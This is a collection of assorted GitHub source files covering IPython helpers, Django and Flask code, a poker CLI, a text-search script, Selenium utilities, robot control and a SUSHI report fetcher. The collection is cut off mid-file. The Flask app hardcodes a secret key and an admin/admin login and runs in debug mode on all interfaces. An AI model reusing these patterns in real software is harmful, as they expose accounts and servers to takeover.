+{"seq_id":"9066248156","text":"\nfrom IPython.display import HTML, display, YouTubeVideo\n\ndef prefix(url):\n    prefix = '' if url.startswith('http') else 'http://'\n    return prefix + url\n\n\ndef simple_link(url, name=None):\n    name = url if name is None else name\n    url = prefix(url)\n    return '<a href=\"%s\" target=\"_blank\">%s</a>' % (url, name)\n\n\ndef html_link(url, name=None):\n    return HTML(simple_link(url, name))\n\n\n# Utility functions\ndef website(url, name=None, width=800, height=450):\n    html = []\n    name = url if name == 'auto' else name\n    if name:\n        html.extend(['<div class=\"nb_link\">',\n                     simple_link(url, name),\n                     '</div>'] )\n\n    html.append('<iframe src=\"%s\" width=\"%d\" height=\"%d\"></iframe>' % (prefix(url), width, height))\n    return HTML('\\n'.join(html))\n\n\ndef nbviewer(url=None, gist=None, name=None, width=800, height=450):\n    if url:\n        return website('nbviewer.ipython.org/url/' + url, name, width, height)\n    elif gist:\n        return website('nbviewer.ipython.org/' + str(gist), name, width, height)\n\n","repo_name":"ellisonbg/talk-2014-strata-sc","sub_path":"talktools.py","file_name":"talktools.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"53"} +{"seq_id":"20558337149","text":"from django.contrib.auth.models import User\nfrom django.test import TestCase\nfrom tastypie.test import ResourceTestCaseMixin\n\nfrom tests.utils import get_api_key, get_api_url\n\n\nclass ProfileUpdateResourceTest(ResourceTestCaseMixin, TestCase):\n    fixtures = ['tests/test_user.json',\n                'tests/test_oppia.json',\n                'tests/test_permissions.json']\n\n    def setUp(self):\n        super(ProfileUpdateResourceTest, self).setUp()\n        self.username = 'demo'\n        self.user = User.objects.get(username=self.username)\n        self.api_key = get_api_key(user=self.user).key\n        self.base_data = {\n            'email': 'demo@me.com',\n            'first_name': 'demo',\n            'last_name': 'user',\n            'organisation': ''\n        }\n        self.url = get_api_url('v1', 'profileupdate')\n\n    def get_credentials(self):\n        return self.create_apikey(username=self.username, api_key=self.api_key)\n\n    def test_edit_own_profile_user(self):\n        orig_firstname = self.user.first_name\n        new_firstname = 'Hernan'\n\n        orig_lastname = self.user.last_name\n        new_lastname = 'Cortez'\n\n        orig_org = self.user.userprofile.organisation\n        new_org = 'my organisation'\n\n        post_data = self.base_data.copy()\n        post_data['first_name'] = new_firstname\n        post_data['last_name'] = new_lastname\n        post_data['organisation'] = new_org\n\n        response = self.api_client.post(self.url,\n                                        format='json',\n                                        data=post_data,\n                                        authentication=self.get_credentials())\n        self.assertHttpCreated(response)\n\n        updated_user = User.objects.get(username=self.username)\n        self.assertNotEqual(orig_firstname, updated_user.first_name)\n        self.assertNotEqual(orig_lastname, updated_user.last_name)\n        self.assertNotEqual(orig_org, updated_user.userprofile.organisation)\n","repo_name":"DigitalCampus/django-oppia","sub_path":"tests/api/v1/test_profile_update.py","file_name":"test_profile_update.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"14074084007","text":"import flask\r\nfrom flask import render_template, url_for, flash, redirect\r\n\r\nfrom forms import RegistrationForm, LoginForm\r\n\r\n\r\napp = flask.Flask(__name__)\r\n\r\napp.config['SECRET_KEY'] = '5791628bb0b13ce0c676dfde280ba245'\r\n\r\nproducts = [\r\n    {\r\n        'author' : 'Ruben Barcelo',\r\n        'product' : 'Car',\r\n        'units' : '2',\r\n        'date_posted' : 'April 20, 2018'\r\n    },\r\n{\r\n        'author' : 'Carlos Jimenez',\r\n        'product' : 'Motorbike',\r\n        'units' : '1',\r\n        'date_posted' : 'May 25, 2018'\r\n    }\r\n]\r\n\r\n@app.route('/')\r\n@app.route('/home')\r\ndef home():\r\n    return render_template('home.html', products=products)\r\n\r\n@app.route('/register', methods=['GET', 'POST'])\r\ndef register():\r\n    form = RegistrationForm()\r\n    if form.validate_on_submit():\r\n        flash(f'Account created for {form.username.data}!', 'success')\r\n        return redirect(url_for('home'))\r\n\r\n    return render_template('register.html', title='Register', form=form)\r\n\r\n@app.route('/login', methods=['GET', 'POST'])\r\ndef login():\r\n    form = LoginForm()\r\n    if form.validate_on_submit():\r\n        if form.email.data == 
'admin@admin.com' and form.password.data == 'admin':\r\n            flash(f'You have logged in successfully!', 'success')\r\n            return redirect(url_for('home'))\r\n        else:\r\n            flash(f'Login failed!', 'danger')\r\n\r\n    return render_template('login.html', title='Login', form=form)\r\n\r\napp.run(host=\"0.0.0.0\", port=5000, debug=True)\r\n\r\n","repo_name":"rafer1998/AD-FIB","sub_path":"test/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14354484299","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Online News Shares\n\n# ## Importing the libraries\n\n# In[5]:\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\n\n\n# ## Importing the dataset\n\n# In[6]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\nsns.set_style('whitegrid')\ndf = pd.read_csv('OnlineNewsPopularity.csv')\ndf.head(5)\n\n\n# In[7]:\n\n\ndf= df.drop(['url', ' timedelta'], axis=1)\ndf= df.iloc[:,[24,25,28,39,40,58]]\n\n\n# ## Pair wise scatter plots \n\n# In[8]:\n\n\nsns.pairplot(df)\nListAttr = []\nlengthOfList = len(df)\nfor i in df:\n    print(i)\n    ListAttr.append(i)\nprint(len(ListAttr)) \n\n","repo_name":"Garima-che/Machine-Learning-UHFall-2020","sub_path":"Comparison of NN and LR/HW4Q2_scatterplot.py","file_name":"HW4Q2_scatterplot.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27188245578","text":"from time import sleep\n\nfrom rich.table import Table\nfrom rich.console import Console\nfrom rich.columns import Columns\nfrom rich.panel import Panel\n\n\nfrom poker.utils.constants import (\n    BetAction,\n    Decision, \n    Cash,\n    Blind, \n    COMPETITION, \n    PLAYER_NAME,\n    GAME_DELAY,\n    PLAYER_TABLE_COLUMNS,\n    FIRST_PLAYER,\n    HIDDEN,\n    TIE\n)\nfrom poker.utils.exception import (\n    RangeException, \n    CashException, \n    InvalidActionException, \n    NegativeException,\n    InsufficientChipException\n)\nfrom poker.utils.chip import GameStack\nfrom poker.utils.card import Card\n\n\nclass GameMessage:\n\n    def __init__(self) -> None:\n        self.cash_options = [item.value for item in Cash]\n        self.decision = [item.value for item in Decision]\n\n    def play(self) -> bool:\n        player_response = input(\"Welcome to Texas hold'em! Would you like to play a game? [yes/no] \").lower()\n        if player_response in [Decision.Y.value, Decision.YES.value]:\n            return True\n        return False \n    \n    def starting_cash(self) -> int:\n        try:\n            player_response = int(input(f\"How much money would you like to start off with? {self.cash_options} \"))\n            if player_response not in self.cash_options:\n                raise CashException\n            return player_response\n        except (ValueError, CashException) as err:\n            print(err)\n            player_response = self.starting_cash()\n            return player_response\n    \n    def competition_count(self) -> int:\n        try:\n            count = int(input(f\"How many players would you like to play against? {COMPETITION} \"))\n            if count not in COMPETITION:\n                raise RangeException\n            return count\n        except (ValueError, RangeException) as err:\n            print(err)\n            count = self.competition_count()\n            return count\n\n    def raise_response(self, raise_amount: int, chip_count: int) -> str:\n        try:\n            player_response = input(f\"The bet was raised by {raise_amount}, what would you like to do? 
[{BetAction.CALL.value} or {BetAction.FOLD.value}] \").lower()\n if player_response not in [BetAction.CALL.value, BetAction.FOLD.value]:\n raise InvalidActionException(valid_actions=[BetAction.CALL.value, BetAction.FOLD.value])\n if raise_amount > chip_count and player_response != BetAction.FOLD.value:\n raise InsufficientChipException(chip_count=chip_count)\n return player_response\n except (InvalidActionException, InsufficientChipException) as err:\n print(err)\n player_response = self.raise_response(raise_amount=raise_amount, chip_count=chip_count)\n return player_response\n\n def action(self, chip_count: int) -> str:\n if chip_count == 0:\n valid_actions = [BetAction.CHECK.value, BetAction.FOLD.value]\n else:\n valid_actions = [BetAction.CHECK.value, BetAction.RAISE.value, BetAction.FOLD.value]\n\n try:\n player_response = input(f\"What would you like to do? [{', '.join(valid_actions)}] \").lower()\n if player_response not in valid_actions:\n raise InvalidActionException(valid_actions=valid_actions)\n return player_response\n except InvalidActionException as err:\n print(err)\n player_response = self.action()\n return player_response\n\n def action_taken(self, name: str, action: str, amount: int, possible_actions: list[str] = []) -> None:\n print(f\"{name} decided to {action} {amount if action in possible_actions else ''}\") \n \n def increase(self, chip_count: int) -> int:\n try:\n player_response = int(input(f\"How much would you like to raise? \"))\n if player_response < 0:\n raise NegativeException\n if player_response > chip_count:\n raise InsufficientChipException(chip_count=chip_count)\n return player_response\n except (ValueError, NegativeException, InsufficientChipException) as err:\n print(err)\n player_response = self.increase(chip_count=chip_count)\n return player_response\n \n def player_summary(self, players: dict) -> None:\n player_table = Table(title=\"Player Summary\")\n\n for column in PLAYER_TABLE_COLUMNS:\n player_table.add_column(column)\n\n for player_id, player in players.items():\n player = player[\"player\"]\n player_order = str(player_id)\n player_name = player.name \n player_chips = f\"{GameStack.white['name']}: {player.stack.chips[GameStack.white['name']]}\"\n player_blind = Blind.BIG.name if player_id == FIRST_PLAYER else Blind.SMALL.name\n\n player_pocket_cards = HIDDEN \n if player.name == PLAYER_NAME or len(player.best_hand) > 1:\n player_pocket_cards = \" \".join(f\"{card}\" for card in player.pocket_cards) \n \n player_best_hand = \"\"\n short_name = \"\"\n if len(player.best_hand) > 1:\n player_best_hand = \", \".join(f\"{card}\" for card in player.best_hand[\"hand\"]) \n short_name = player.best_hand[\"short\"]\n \n player_table.add_row(\n player_order, \n player_name, \n player_chips,\n player_blind,\n player_pocket_cards,\n player_best_hand,\n short_name\n )\n \n console = Console()\n console.print(\"\", player_table)\n \n def game_progression_prompt(self, progress: bool = None) -> None:\n if progress:\n player_response = input(f\"How about now, are you ready? [yes/no] \").lower()\n else:\n player_response = input(f\"Are you ready to continue? 
[yes/no] \").lower()\n \n if player_response not in self.decision:\n sleep(GAME_DELAY)\n self.game_progression_prompt()\n if player_response in [Decision.N.value, Decision.NO.value]:\n sleep(GAME_DELAY)\n self.game_progression_prompt(progress=True) \n\n def game_summary(self, pot: GameStack, community_cards: list) -> None:\n game_pot = [Panel(f\"Game Pot\\n{key}: {value}\") for key, value in pot.chips.items()]\n game_pot.extend(Panel(f\"Card {card_number + 1}\\n{community_cards[card_number]}\") for card_number in range(len(community_cards)))\n console = Console()\n console.print(Columns(game_pot))\n\n def showdown(self, winner: dict, pot: GameStack, players: dict, community_cards: list[Card]) -> None:\n sleep(GAME_DELAY)\n self.game_summary(pot=pot, community_cards=community_cards)\n sleep(GAME_DELAY)\n self.player_summary(players=players)\n sleep(GAME_DELAY)\n\n if len(winner) > TIE:\n winners = len(winner) // 2\n winnings = pot.cash_equivalent() / winners\n winners_names = []\n for key, value in winner.items():\n if \"name\" in key:\n winners_names.append(value)\n winners_names_string = \", \".join(winners_names)\n print(f\"\\nWe have a tie! Congratulations {winners_names_string}! You each won ${winnings}!\")\n \n if len(winner) == TIE:\n if winner[\"name\"] == PLAYER_NAME:\n print(f\"\\nCongratulations you won ${pot.cash_equivalent()}!\")\n else:\n print(f\"\\nCongratulations {winner['name']}! You won ${pot.cash_equivalent()}!\")","repo_name":"BenGriffith/poker","sub_path":"poker/utils/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":7615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40051696415","text":"# link to problem: https://www.hackerrank.com/challenges/30-binary-numbers/problem\n\nn = int(input().strip())\npower = 0\nbinary_str = ''\nwhile 2 ** power <= n:\n power += 1\npower -= 1\n\nwhile power >= 0:\n if n - 2 ** power >= 0:\n n = n - 2 ** power\n binary_str += '1'\n else:\n binary_str += '0'\n power -= 1\n\nbinary_list = filter(lambda x: x != '', binary_str.split('0'))\nprint(len(max(binary_list)))","repo_name":"L-Ignatova/hacker-rank-challenges","sub_path":"thirtydaysofcode/day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29415382621","text":"import os\nimport json\nimport math\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\n\n## Config\n\nDATASET_DIR = 'dataset'\nOUTPUT_FILENAME = 'vsm.json'\n\n\n## Globals\n\ninverted_index = dict()\ndocs = list()\nLEMMATIZER = WordNetLemmatizer()\nSTOP_WORDS = set(stopwords.words('english'))\n\n## Generate Inverted Index and output as JSON\n\ndef normalize(word):\n output = word.lower() # Case Folding\n if output in STOP_WORDS or not word.isalnum(): # Stop Word & Punctuation Removal\n return None\n return LEMMATIZER.lemmatize(output) # Lemmatization\n\ndef save_as_json(data):\n with open(OUTPUT_FILENAME, 'w') as output_file:\n json.dump(data, output_file)\n \n\ndef generate_inverted_index(dataset_dir):\n print('Generation of inverted index started ...')\n # List all .txt documents in the directory\n documents = [ document for document in os.listdir(dataset_dir) if document.endswith('.txt') ]\n for document in documents:\n docs.append(document.replace('.txt', ''))\n doc_id = len(docs) - 1\n\n with open(f'{dataset_dir}/{document}', 'r') as 
input_file:\n raw_data = input_file.read()\n\n # Step 1: Tokenize words\n words = word_tokenize(raw_data)\n\n for i in range(len(words)):\n word = words[i]\n # Step 2: Normalize Words\n processed_word = normalize(word)\n if processed_word is None:\n continue\n \n # Step 3: Add to inverted index\n if processed_word not in inverted_index.keys():\n inverted_index[processed_word] = {}\n if doc_id not in inverted_index[processed_word].keys():\n inverted_index[processed_word][doc_id] = 0\n inverted_index[processed_word][doc_id] += 1\n\n save_as_json(inverted_index)\n print(f'Inverted index saved as {OUTPUT_FILENAME}!!')\n\n## Parsing Queries\ndef generate_query_index_ltn(query):\n # Calculates ltn -> logarithmic tf - idf score(not normalized)\n # for the query terms \n query_index = {}\n words = word_tokenize(query)\n\n for i in range(len(words)):\n word = words[i]\n processed_word = normalize(word)\n if processed_word is None:\n continue\n\n if processed_word not in query_index and processed_word in inverted_index:\n # Keep only words that are also present in Inverted Index\n query_index[processed_word] = 0\n query_index[processed_word] += 1\n \n for term in query_index:\n tf = query_index[term]\n df = len(inverted_index[term])\n query_index[term] = (1 + math.log10(tf)) * math.log10(len(docs) / df)\n return query_index\n\ndef use_second(elem):\n return elem[1]\n\ndef parse(query):\n vsm = [] # format: [(doc_id, score), ...]\n query_index = generate_query_index_ltn(query)\n for i in range(len(docs)):\n weights = {}\n normalizer = 0\n for term in query_index:\n tf = 0 if i not in inverted_index[term].keys() else inverted_index[term][i]\n weight = 0 if tf == 0 else 1 + math.log10(tf)\n weights[term] = weight\n normalizer += weight ** 2\n normalizer = normalizer ** 0.5\n \n if normalizer == 0:\n continue\n \n score = 0\n for term in query_index:\n score += query_index[term] * (weights[term] / normalizer)\n vsm.append((i, score))\n sorted_vsm = sorted(vsm, key=use_second, reverse=True)\n sorted_ids = [sorted_vsm[i][0] for i in range(len(sorted_vsm))]\n return sorted_ids\n\n \nif __name__ == '__main__':\n generate_inverted_index(DATASET_DIR)\n\n while True:\n query = input('Enter your query(q to quit):')\n if query.lower() == 'q':\n break\n else:\n output_ids = parse(query) # These will be ranked in order\n print('\\n### Relevant Documents ### \\n')\n no_of_docs_printed = len(output_ids) if len(output_ids) < 10 else 10\n for i in range(no_of_docs_printed):\n print(docs[output_ids[i]])\n print()\n\n print('Exiting ....')\n ","repo_name":"prakamya-mishra/Information-Retrieval","sub_path":"3_vsm.py","file_name":"3_vsm.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11652462581","text":"import sqlite3\nimport datetime\n\n# connect to the database\nconn = sqlite3.connect('people.db')\nc = conn.cursor()\n\nquery = \"SELECT first_name, age FROM people WHERE age >= 50 LIMIT 20\"\n\nc.execute(query)\n\nresults = c.fetchall()\n\nprint(\"Old People:\")\n\nfor name, age in results:\n print(f\"{name} is {age} years old.\")\n\nconn.close()\n","repo_name":"sha2003ca/COMP593-Lab7","sub_path":"python old_people.py","file_name":"python old_people.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38052924200","text":"from flask import Flask\r\n\r\nfrom .database.connection import *\r\nfrom .import 
create_app\r\napp = Flask(__name__)\r\n\r\napp = create_app()\r\n\r\ntry:\r\n db = initialize_db()\r\n connection = db.connect()\r\n\r\n Session = sessionmaker(bind=db)\r\n session = Session()\r\n\r\nexcept ValueError as e:\r\n print(e)","repo_name":"Trouttt/flask_modular_template","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70220304489","text":"from selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom locators_testdata import configReader\n\n\nclass BaseDriver:\n \n def __init__(self,driver):\n self.driver =driver\n \n ## This is explicit wait \n def global_wait_explicit_single_elemnt(self,wait,locator):\n # list_element = self.wait.until(EC.presence_of_all_elements_located((By.locator_type,locator)))\n # self.wait.until(EC.presence)\n # wait_val = self.WebDriverWait(self.driver, wait).wait_val.until(EC.presence_of_element_located(locator_type,locator))\n wait_va = WebDriverWait(self.driver,wait)\n elem = wait_va.until(EC.visibility_of_element_located((By.XPATH,locator)))\n return elem\n \n ## This is entering data in text field \n def text_field_entered(self,locator,testdata):\n generic_wait = configReader.readConfigData('Details', 'globalWait')\n user__entered = self.global_wait_explicit_single_elemnt(generic_wait,locator)\n final_value = user__entered.send_keys(testdata)\n return final_value\n \n \n # self.driver.find_element(\"xpath\",locator).send_keys(testdata)\n # return wait_for_ele\n \n ## This is generic hyperlink \n def click_hyperlink(self,locator):\n generic_wait = configReader.readConfigData('Details', 'globalWait')\n user_click = self.global_wait_explicit_single_elemnt(generic_wait,locator)\n user_click.click()\n \n ### logic to extract data from table \n def tble_data_verify(self):\n columns = len(self.driver.find_elements(By.XPATH,\"//table[contains(@id,'_ctl0__ctl0_Content_Main_MyTransactions')]//tr[1]//td\"))\n rows = len(self.driver.find_elements(By.XPATH,\"//table[contains(@id,'_ctl0__ctl0_Content_Main_MyTransactions')]//tr\"))\n print(\"rows - \",rows) # rows - 3\n print(\"columns - \",columns) #columns - 4\n for row in range(1,rows):\n # print(row)\n for col in range(1,columns+1):\n values = self.driver.find_element(By.XPATH,\"//table[contains(@id,'_ctl0__ctl0_Content_Main_MyTransactions')]//tr[\"+str(row)+\"]//td[\"+str(col)+\"]\").text\n open('../utitlity/table.txt','w+').write(values)\n\n \n # print(f\"Dynamic web table index {row}, ---> {col}, --------> {values}\",end=\"\")\n # print(values,end=\"\")\n # print(type(values))\n # if (values.find(dataMatch)== 1):\n # assert True\n # break\n \n # values = self.driver.find_element(By.XPATH,\"//table[contains(@id,'_ctl0__ctl0_Content_Main_MyTransactions')]//tr[\"+str(row+1)+\"]//td[\"+str(col+1)+\"]\").text\n # print(valuesF,end=\" \")\n # else:\n # value_ele = self.driver.find_element(By.XPATH,\"//table[contains(@id,'_ctl0__ctl0_Content_Main_MyTransactions')]//tr[\"+str(row-1)+\"]//td[\"+str(col-1)+\"]\").text\n # print(value_ele,end=\"\")\n # generic_wait = configReader.readConfigData('Details', 'globalWait')\n # table_data = self.driver.find_element(\"xpath\",table_locator)\n # # rows=str(table_data.find_elements(By.TAG_NAME,\"tr\"))\n # # table_id = driver.find_element(By.ID, 'data_configuration_feeds_ct_fields_body0')\n # rows = 
table_data.find_elements(By.TAG_NAME, \"tr\") \n # # get all of the rows in the table\n # for row in rows:\t\n # # Get the columns (all the column 2) \n # #note: index start from 0, 1 is col 2\n # col = row.find_elements(By.TAG_NAME, \"td\")\n # print(col.text) #prints text from the element\n\n # for row in rows[1:]:\n # cells=row.find_elements(By.TAG_NAME,\"td\")\n # transaction_ID,transaction_Time,account_ID,action,amount = [cell.text for cell in cells]\n # print(f\"Transaction ID is {transaction_ID}, Transaction Time is {transaction_Time}, account ID is {account_ID}, Action is {action}, Amount is {amount} \")\n # return transaction_ID,transaction_Time,account_ID,action,amount\n \n \n def cap_screenshot(self,file):\n return self.driver.save_screenshot(file)","repo_name":"akhi1212/POM_datadriven","sub_path":"BaseClass/base_driver.py","file_name":"base_driver.py","file_ext":"py","file_size_in_byte":4294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34380283446","text":"from cibyl.cli.argument import Argument\nfrom cibyl.models.model import Model\n\n# pylint: disable=no-member\n\n\nclass Package(Model):\n \"\"\" Model for packages found on Openstack node.\"\"\"\n\n API = {\n 'name': {\n 'attr_type': str,\n 'arguments': []\n },\n 'origin': {\n 'attr_type': str,\n 'arguments': [Argument(name='--package-origin', arg_type=str,\n nargs=\"*\", func=\"get_deployment\",\n description=\"Package origin\")]\n }\n }\n\n def __init__(self, name: str, origin: str = None):\n super().__init__({'name': name, 'origin': origin})\n\n def merge(self, other):\n \"\"\"Merge the information of two package objects representing the\n same package.\n\n :param other: The Package object to merge\n :type other: :class:`.Package`\n \"\"\"\n if not self.origin.value:\n self.origin.value = other.origin.value\n","repo_name":"RedHatCRE/cibyl","sub_path":"cibyl/plugins/openstack/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"33565167610","text":"#!/usr/bin/env python\n\n# This program sends Baxter to specified position\n# Written by Jack Schultz\n# Created 1/11/22\n\nimport rospy\nimport baxter_interface\nimport sys\nimport pickle\nimport sys, getopt\n\nclass control_baxter():\n def __init__(self, limb, verbose=True):\n # Initialize parameters\n self._limb_name = limb\n self._verbose = False\n self._limb = baxter_interface.Limb(limb)\n self._gripper = baxter_interface.Gripper(limb)\n self._rs = baxter_interface.RobotEnable(baxter_interface.CHECK_VERSION)\n self._init_state = self._rs.state().enabled\n left = baxter_interface.Gripper('left', baxter_interface.CHECK_VERSION)\n if self._verbose:\n print(\"Getting robot state... \")\n print(\"Enabling robot... 
\")\n self._rs.enable()\n if self._verbose:\n print(\"Calibrating gripper...\")\n left.calibrate()\n\n # Node cycle rate (in Hz).\n self.loop_rate = rospy.Rate(100)\n\n # Robot Functions\n def move_to_angles(self, start_angles=None):\n # print(\"Moving the {0} arm to start pose...\".format(self._limb_name))\n if not start_angles:\n start_angles = dict(zip(self._joint_names, [0]*7))\n self._guarded_move_to_joint_position(start_angles)\n rospy.sleep(0.1)\n\n def _servo_to_pose(self, pose):\n # servo down to release\n joint_angles = self.ik_request(pose)\n self._guarded_move_to_joint_position(joint_angles)\n\n def _guarded_move_to_joint_position(self, joint_angles):\n if joint_angles:\n self._limb.move_to_joint_positions(joint_angles)\n else:\n rospy.logerr(\"No Joint Angles provided for move_to_joint_positions. Staying put.\")\n\ndef main(argv):\n\n rospy.init_node(\"send_baxter_home\")\n limb = 'left'\n\n run = control_baxter(limb)\n\n target = ''\n\n try:\n opts, args = getopt.getopt(argv,\"ht:\",[\"target=\",])\n except getopt.GetoptError:\n print('Usage: send_to.py -t ')\n print('Target Options: ')\n print(' - home')\n print(' - GPD')\n sys.exit(2)\n \n if len(opts) > 0:\n for opt, arg in opts:\n if opt == '-h':\n print('send_to.py -t ')\n sys.exit()\n elif opt in (\"-t\", \"--target\"):\n target = arg\n else:\n target = \"home\"\n else:\n target = \"home\"\n \n print('Target:', target)\n\n if target == \"GPD\":\n home_joint_angles = dict()\n home_joint_angles['left_e0'] = -0.4126408319411763\n home_joint_angles['left_e1'] = 1.6766410011587571\n home_joint_angles['left_s0'] = 0.3056456719861687\n home_joint_angles['left_s1'] = -1.358339987672534\n home_joint_angles['left_w0'] = 0.18331070415230694\n home_joint_angles['left_w1'] = 0.5495486172599495\n home_joint_angles['left_w2'] = -0.30833013836496814\n elif target == \"home\":\n # Read home position set in Calibration.py\n with open('/home/labuser/raf/set_positions/home_position.pkl', 'rb') as handle:\n home_joint_angles = pickle.load(handle)\n handle.close()\n else:\n print('Usage: send_to.py -t ')\n print('Target Options: ')\n print(' - home')\n print(' - GPD')\n sys.exit(2)\n\n run.move_to_angles(home_joint_angles)\n\n return 0\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv[1:]))","repo_name":"chms-raf/raf-v1","sub_path":"scripts/send_to.py","file_name":"send_to.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9391038865","text":"from lxml import etree\r\nfrom lxml import objectify\r\nimport requests as rq\r\nfrom pprint import pprint\r\nimport pandas as pd\r\nimport os\r\nimport calendar\r\nimport time\r\n\r\nimport pendulum\r\nimport collections\r\nimport datetime\r\nimport logging\r\nimport time\r\nimport uuid\r\n\r\n\r\nNS = {\r\n\t\t\"SOAP-ENV\": \"http://schemas.xmlsoap.org/soap/envelope/\",\r\n\t\t\"sushi\": \"http://www.niso.org/schemas/sushi\",\r\n\t\t\"sushicounter\": \"http://www.niso.org/schemas/sushi/counter\",\r\n\t\t\"counter\": \"http://www.niso.org/schemas/counter\",\r\n\t}\r\n\r\n\r\ndef add_sub(parent, tag, content):\r\n\ttemp = etree.SubElement(parent, tag)\r\n\ttemp.text = content\r\n\treturn temp\r\n\r\ndef spaceout(n = 2):\r\n\tfor i in range(n):\r\n\t\tprint()\r\n#\r\ndef view(parent_node):\r\n\tprint(\"************************************************************\")\r\n\tprint(etree.tostring(parent_node,pretty_print = True, encoding = 'unicode')) \t\t#look at the whole 
tree\r\n\tprint(\"************************************************************\")\r\n\r\n#############################################################################################################################\r\n#############################################################################################################################\r\n#\r\n#############################################################################################################################\r\ndef raw_xml_rep( lg, mnth = 3, yr = 2019, report = \"JR1\", release = 4):\r\n\t'''\r\n\t#Retrive the XML-formatted report from the given SUSHI server\r\n\tlg -> a 3-member tuple of strings that holds the SUSHI server's location and login credentials\r\n\t\tlg[0] -> (str) The SUSHI server URL\r\n\t\tlg[1] -> (str) The SUSHI requestor ID\r\n\t\tlg[2] -> (str) the SUSHI customer ID\r\n\tmnth -> (int) the month of the requested report\r\n\tyr -> (int) the year of the requested report\r\n\treport -> (str) the type of report requested\r\n\trelease -> (int) the COUNTER release of the requested report. Currently defaults to 4.\r\n\t'''\r\n\twsdl_url = lg[0]\r\n\tstart_date = datetime.date(yr,mnth,1)\r\n\tend_date = datetime.date(yr, mnth, calendar.monthrange(yr,mnth)[1])\r\n\trequestor_id = lg[1]\r\n\trequestor_email=None\r\n\trequestor_name=None\r\n\tcustomer_reference=lg[2]\r\n\tcustomer_name=None\r\n\t#report=\"JR2\" \t\t#tombstoned for testing\r\n\tsushi_dump=False\r\n\tverify=True\r\n\t#release = 4\t\t#tombstoned for testing\r\n\r\n\t#========================================================================\r\n\t#INITIALIZE VARIABLES AND CONTEXT VARIABLES\r\n\tNS = {\r\n\t\t\"SOAP-ENV\": \"http://schemas.xmlsoap.org/soap/envelope/\",\r\n\t\t\"sushi\": \"http://www.niso.org/schemas/sushi\",\r\n\t\t\"sushicounter\": \"http://www.niso.org/schemas/sushi/counter\",\r\n\t\t\"counter\": \"http://www.niso.org/schemas/counter\",\r\n\t}\r\n\t#=======================================================================\r\n\trooty = etree.Element(\"{%(SOAP-ENV)s}Envelope\" % NS, nsmap=NS)\t#This is the root of the tree that we're going to pass as the header to the SUSHI server.\r\n\tbody = etree.SubElement(rooty, \"{%(SOAP-ENV)s}Body\" % NS)\t\t#build the body node for the SUSHI request tree\r\n\ttimestamp = pendulum.now(\"UTC\").isoformat()\t\t\t\t\t\t#Timestamp the report request\r\n\trr = etree.SubElement(\r\n\t\tbody,\r\n\t\t\"{%(sushicounter)s}ReportRequest\" % NS,\r\n\t\t{\"Created\": timestamp, \"ID\": str(uuid.uuid4())},\r\n\t)\r\n\t#=======================================================\r\n\t\r\n\t#Create the XML outline that's going to be submitted with the POST request to the SUSHI server for population.\r\n\r\n\treq = etree.SubElement(rr, \"{%(sushi)s}Requestor\" % NS)\t# Link to the sushi schema and add this link into the etree with the 'Requestor' tag\r\n\trid = add_sub(req, \"{%(sushi)s}ID\" % NS, requestor_id)\t# Create a new subelement of 'req' tagged 'ID' containing the requestor ID\r\n\t#-----------\r\n\treq_name_element = add_sub(req, \"{%(sushi)s}Name\" % NS, requestor_name)\t\t#Create a child node of 'req' tagged 'Name', holding the requestor name (Institution name)\r\n\treq_email_element = add_sub(req, \"{%(sushi)s}Email\" % NS, requestor_email)\t#Create a child node of 'req' tagged 'Email', holding the requestor's provided email address\r\n\t#-----------\r\n\tcust_ref_elem = etree.SubElement(rr, \"{%(sushi)s}CustomerReference\" % NS)\t#Create a child node of 'req' tagged 'CustomerReference'\r\n\tci = 
